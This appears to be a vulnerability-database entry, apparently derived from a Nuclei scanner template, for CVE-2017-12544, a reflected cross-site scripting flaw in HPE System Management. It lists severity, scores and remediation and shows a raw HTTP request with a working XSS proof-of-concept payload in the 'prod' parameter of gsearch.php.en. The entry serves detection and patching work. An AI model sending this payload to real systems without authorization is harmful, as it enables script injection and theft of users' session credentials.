| Title | HPE System Management - Cross-Site Scripting |
|---|---|
| Author | divya_mudgal |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. |
| Remediation | Apply the latest security patches or updates provided by HPE to fix the XSS vulnerability in the System Management software. |
| CVSS Score | 5.4 |
| EPSS Score | 0.72051 |
| CVE ID | CVE-2017-12544 |
| CWE ID | CWE-79 |
| Tags | cve cve2017 xss hp vuln |
HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
GET /gsearch.php.en?prod=';prompt`document.domain`;// HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-12544.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-12544.pcap
N/AN/A